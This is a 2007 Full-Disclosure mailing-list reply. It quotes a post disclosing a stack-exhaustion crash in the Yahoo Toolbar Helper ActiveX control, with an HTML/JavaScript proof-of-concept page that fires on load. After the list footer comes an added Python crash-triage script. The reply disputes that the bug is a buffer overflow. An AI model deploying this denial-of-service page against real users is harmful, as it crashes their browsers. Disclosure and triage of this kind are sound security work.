Re: [Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS
- From: "Joey Mengele" <joey.mengele@xxxxxxxxxxxx>
- Date: Fri, 30 Nov 2007 10:59:37 -0500
Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41
characters. Except for the fact that this again is a stack overflow
exception and not a stack based buffer overflow. I implore you,
LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.
J
On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
<elazarb@xxxxxxxxxxxxx> wrote:
There is a stack overflow in the c() method of the Yahoo Toolbar
Helper class. This overflow does not appear to get anywhere near
the EIP or SEH. PoC as follows:
----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-C3F9-4EFB-9B51-7695ECA05670}
obj.c(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
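The distinction drawn in the reply, stack exhaustion versus a stack-based buffer overflow that reaches EIP or the SEH handler, expressed as a crash-triage check. This is an added example, not part of either post; the record field names and sample values are constructed, and the two-page ESP threshold is a heuristic assumption.

```python
# Added illustration; crash-record field names are hypothetical.
STATUS_ACCESS_VIOLATION = 0xC0000005
STATUS_STACK_OVERFLOW = 0xC00000FD        # thread stack exhausted
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409  # /GS stack cookie check failed
PAGE = 0x1000


def is_filler(value):
    """True for a 32-bit value made of one repeated printable byte (0x41414141)."""
    raw = value.to_bytes(4, "little")
    return len(set(raw)) == 1 and 0x20 <= raw[0] < 0x7F


def classify(crash):
    """Return (verdict, reason) for one 32-bit crash record."""
    code = crash["code"]
    # Which control values, if any, were replaced by input filler bytes?
    hijacked = [n for n in ("eip", "seh_handler") if is_filler(crash[n])]
    if code == STATUS_STACK_OVERFLOW:
        # Heuristic (assumption): ESP within two pages of the committed limit.
        near = abs(crash["esp"] - crash["stack_limit"]) < 2 * PAGE
        if near and not hijacked:
            return ("stack exhaustion", "ESP at stack limit, EIP/SEH intact")
        return ("stack exhaustion, review", "ESP or control data unexpected")
    if code == STATUS_STACK_BUFFER_OVERRUN:
        return ("stack buffer overrun", "stack cookie mismatch")
    if code == STATUS_ACCESS_VIOLATION and hijacked:
        return ("control data overwritten", "filler bytes in " + ", ".join(hijacked))
    return ("unclassified", "needs manual analysis")


# Constructed sample records, not taken from the post or from a real crash.
SAMPLES = {
    "exhaustion": {"code": 0xC00000FD, "eip": 0x10012345,
                   "seh_handler": 0x10020000, "esp": 0x00033010,
                   "stack_limit": 0x00033000},
    "eip": {"code": 0xC0000005, "eip": 0x41414141,
            "seh_handler": 0x10020000, "esp": 0x0012F000,
            "stack_limit": 0x00033000},
    "seh": {"code": 0xC0000005, "eip": 0x10012345,
            "seh_handler": 0x41414141, "esp": 0x0012F000,
            "stack_limit": 0x00033000},
    "plain_av": {"code": 0xC0000005, "eip": 0x10012345,
                 "seh_handler": 0x10020000, "esp": 0x0012F000,
                 "stack_limit": 0x00033000},
}

if __name__ == "__main__":
    for name, record in SAMPLES.items():
        print(name, classify(record))
```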